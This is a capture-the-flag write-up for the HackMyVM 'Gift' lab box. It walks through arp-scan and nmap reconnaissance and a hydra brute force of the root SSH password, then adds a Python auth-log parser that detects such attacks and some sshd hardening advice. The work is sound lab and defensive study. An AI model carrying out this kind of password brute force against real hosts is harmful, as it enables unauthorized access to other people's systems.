
HackmyVM-Gift

Information Gathering

Scan with arp-scan

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 a4:a9:30:df:ef:44 (Unknown)
192.168.31.200 08:00:27:5f:2f:1e PCS Systemtechnik GmbH
192.168.31.220 46:3e:62:f9:1e:fa (Unknown: locally administered)
192.168.31.187 a6:9b:e0:2d:30:9a (Unknown: locally administered)
192.168.31.217 b4:0f:b3:8e:31:07 vivo Mobile Communication Co., Ltd.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.995 seconds (128.32 hosts/sec). 5 responded

The IP address is 192.168.31.200. Next, scan for open ports with nmap.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.200 --min-rate=1000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 00:40 EST
Nmap scan report for gift (192.168.31.200)
Host is up (0.0080s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:5F:2F:1E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.96 seconds

Only ports 22 and 80 are open.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl http://192.168.31.200/

Dont Overthink. Really, Its simple.
<!-- Trust me -->

A directory scan also turns up only index.html, so port 80 offers no entry point. That leaves port 22: brute-force the root password with hydra.

[22][ssh] host: 192.168.31.200   login: root   password: simple

SSH Login

ssh root@192.168.31.200

Both root.txt and user.txt can be read directly.
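
From the defender's side, this sequence (a burst of failed root password attempts followed by one accepted login) is visible in the sshd auth log. The following is an added example, not part of the original writeup: the log lines are constructed, and the function name and the 5-failure threshold are assumptions.

```python
import re
from collections import defaultdict

# OpenSSH sshd auth messages for password logins (syslog prefix is ignored).
EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def find_bruteforce(lines, threshold=5):
    """Return findings per (source IP, user) with at least `threshold` failed
    password attempts; `compromised` is True when an accepted password login
    for the same pair followed the failures."""
    failures = defaultdict(int)
    findings = {}
    for line in lines:
        m = EVENT.search(line)
        if not m:
            continue
        key = (m["ip"], m["user"])
        if m["result"] == "Failed":
            failures[key] += 1
            if failures[key] >= threshold:
                findings.setdefault(key, {"failures": 0, "compromised": False})
                findings[key]["failures"] = failures[key]
        elif key in findings:
            # Success after a burst of failures: the guess landed.
            findings[key]["compromised"] = True
    return findings

# Constructed sample log: six failures for root, then a success, plus one
# ordinary user (hypothetical "alice") who mistypes once and is not flagged.
SAMPLE_LOG = [
    f"Jan 22 00:45:{i:02d} gift sshd[{900 + i}]: Failed password for root "
    f"from 192.168.31.129 port {40000 + i} ssh2"
    for i in range(6)
] + [
    "Jan 22 00:45:07 gift sshd[907]: Accepted password for root from 192.168.31.129 port 40007 ssh2",
    "Jan 22 00:50:01 gift sshd[950]: Failed password for alice from 192.168.31.50 port 51000 ssh2",
    "Jan 22 00:50:09 gift sshd[951]: Accepted password for alice from 192.168.31.50 port 51001 ssh2",
]

if __name__ == "__main__":
    for (ip, user), info in find_bruteforce(SAMPLE_LOG).items():
        status = "LOGIN SUCCEEDED" if info["compromised"] else "no success"
        print(f"{ip} -> {user}: {info['failures']} failed attempts, {status}")
```

With `PermitRootLogin prohibit-password` or `PasswordAuthentication no` in sshd_config, the guessed password would not have produced the accepted login.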

Summary

"Dont Overthink. Really, Its simple." An Easy-rated box: a straight hydra brute force, nothing more to say.